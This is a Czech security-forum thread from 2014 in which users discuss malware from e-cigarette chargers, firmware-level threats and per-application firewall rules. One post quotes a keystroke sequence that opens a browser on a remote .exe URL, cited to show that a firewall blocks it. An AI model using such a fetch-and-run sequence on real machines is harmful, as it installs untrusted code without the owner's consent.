Proti novému viru ochrana prakticky není

Sekce věnovaná virům a jiným škodlivým kódům, rovněž ale nástrojům, kterým se lze proti nim bránit…

Moderátoři: Mods_senior, Security team

Uživatelský avatar
faraon
Master Level 8.5
Master Level 8.5
Příspěvky: 7398
Registrován: prosinec 10
Pohlaví: Muž
Stav:
Offline

Re: Proti novému viru ochrana prakticky není

Příspěvekod faraon » 22 pro 2014 07:52

trodas píše:Z čehož plyne poučení, že cizí flešky si strkat do PC je ruleta asi jako chtít to naostro s prostitutkou... Rozhodně to není rozumné. Takže vypalování dat na DVD-RW má zelenou :)

Nejenom flashky a nejenom cizí:
"Manažerovi blíže nespecifikované korporace se dostal do PC malware. Tento incident byl podroben forenzní analýze, která zjistila přítomnost všech bezpečnostních prvků – antivirus, firewall a veškerý software pracovní stanice byl aktualizován. Po neúspěšném prohledání logů, položili manažerovi sérii otázek, kde jedna se týkala změn v jeho životě v poslední době. Ten na tuto otázku odpověděl, že jen přestal kouřit klasické cigarety a přešel na e-cigarety."

Zdroj: root.cz, soom.cz, theguardian.com, securityaffairs.co, reddit.com

ITCrowd: To by ten firewall musel blokovat všechny servery na planetě kromě těch několika, které navštěvuješ pravidelně. Kdysi jsem také stvořil jeden "virus" speciálně pro W9x. Po třiceti dnech existence změnil jeden bit v jednom textovém souboru na harddisku, a Widle najely do čistého DOSu, odkud se potom musely spustit ručně příkazem win. IT expert po prohlídce počítače prohlásil že to byl "neodborný zásah do systému" a celé to přeinstaloval.
Mě teda změna jedné jedničky na nulu připadá mnohem odbornější než jeho postup :lol:

MiliNess: To může jakýkoliv firmware. Intelovské síťové karty po přijetí speciálního paketu posílají obsah vybraných částí operační paměti, získaný přes DMA, tedy bez vědomí procesoru. A před časem jeden borec nainstaloval Linux na řadič harddisku, stejně tak se tam může uhnízdit cokoliv jiného, pokud to tam už není přímo z výroby, jako v těch MP3 přehrávačích...
"Král Lávra má dlouhé oslí uši, král je ušatec!

(pravil K. H. Borovský o cenzuře internetu)

Reklama
Uziv00
Pohlaví: Nespecifikováno

Re: Proti novému viru ochrana prakticky není

Příspěvekod Uziv00 » 22 pro 2014 08:08

faraon: "To by ten firewall musel blokovat všechny servery na planetě kromě těch několika, které navštěvuješ pravidelně."
Zjevně jsi to nepochopil. Firewall neblokuje stránky, ale zablokuje aplikacím přístup k internetu. Blokování stránek lze např. v proxy.
Já napsal: "Tedy za předpokladu, že iexplore nemá přístup k netu (jako v mém případě)". Tedy aplikace iexplore nemá v mém případě vůbec přístup k síti - tím pádem na žádnou stránku. Takže tvůj příkaz mě neublíží :D

Uživatelský avatar
CZechBoY
Master Level 9.5
Master Level 9.5
Příspěvky: 8813
Registrován: srpen 08
Bydliště: Brno
Pohlaví: Muž
Stav:
Offline
Kontakt:

Re: Proti novému viru ochrana prakticky není

Příspěvekod CZechBoY » 22 pro 2014 09:30

ITCrowd: přejmenování iexplore.exe na iexplore_my.exe a následné spuštění to taky blokuje?
PHP, Nette, MySQL, C#, TypeScript, Python
IntelliJ Idea, Docker, Opera browser, Linux Mint
iPhone XS
Raspberry PI 3 (KODI, Raspbian)
XBox One S, PS 4, nVidia GeForce NOW

Uživatelský avatar
Oxxid
člen BSOD týmu
Master Level 8
Master Level 8
Příspěvky: 6194
Registrován: prosinec 12
Pohlaví: Muž
Stav:
Offline

Re: Proti novému viru ochrana prakticky není

Příspěvekod Oxxid » 22 pro 2014 09:52

iexplore je komponenta jež je využívána i jinými aplikacemi jako embedded-browser. Tudíž bych to nedělal.
Treba nedávno zmiňovaný ballot-screen ve Windows je okénko prohlížeče.

Uziv00
Pohlaví: Nespecifikováno

Re: Proti novému viru ochrana prakticky není

Příspěvekod Uziv00 » 22 pro 2014 10:32

CZechBoY píše:ITCrowd: přejmenování iexplore.exe na iexplore_my.exe a následné spuštění to taky blokuje?

Já mám FW nastaven tak, že blokuje vše. Aplikaci, která má mít přístup k internetu musím povolit. Tedy odpověď na tvou otázku zní ano. FW jsou dokonce tak inteligentní, že pokud se aplikace změní (např. při aktualizaci), tak to poznají a dotáží se. Tedy pokud ti třeba firefox.exe najednou žádá o přístup do netu a přitom nebyla aktualizace a tys nic neprováděl, tak jej zablokuješ, zavřeš smažeš a přeinstaluješ, protože zjevně půjde o napadení. A sekvence "Win+R, firefox http://nsa.gov/client.exe, Enter, Enter, Enter" nic neudělá, protože FF pro .exe soubory nabízí pouze možnost uložení a nikoli spuštění.
Z toho důvodu mám pro IE zakázán přístup k síti. A z toho důvodu používám jiný než wokenní FW, protože FW integrovaný do woken zakázání přístupu IE do sítě vůbec neumožňuje.

Uživatelský avatar
CZechBoY
Master Level 9.5
Master Level 9.5
Příspěvky: 8813
Registrován: srpen 08
Bydliště: Brno
Pohlaví: Muž
Stav:
Offline
Kontakt:

Re: Proti novému viru ochrana prakticky není

Příspěvekod CZechBoY » 22 pro 2014 10:39

ITCrowd: tak není problém si nějaký dialogový okna poklikat žejo :D když už máš přístup ke všemu ve windows.
PHP, Nette, MySQL, C#, TypeScript, Python
IntelliJ Idea, Docker, Opera browser, Linux Mint
iPhone XS
Raspberry PI 3 (KODI, Raspbian)
XBox One S, PS 4, nVidia GeForce NOW

Uziv00
Pohlaví: Nespecifikováno

Re: Proti novému viru ochrana prakticky není

Příspěvekod Uziv00 » 22 pro 2014 10:48

CZboy: a to je právě to. Nesmíš dovolit, aby měl někdo přístup.


Zpět na “Viry, antiviry, firewally…”

Kdo je online

Uživatelé prohlížející si toto fórum: Žádní registrovaní uživatelé a 12 hostů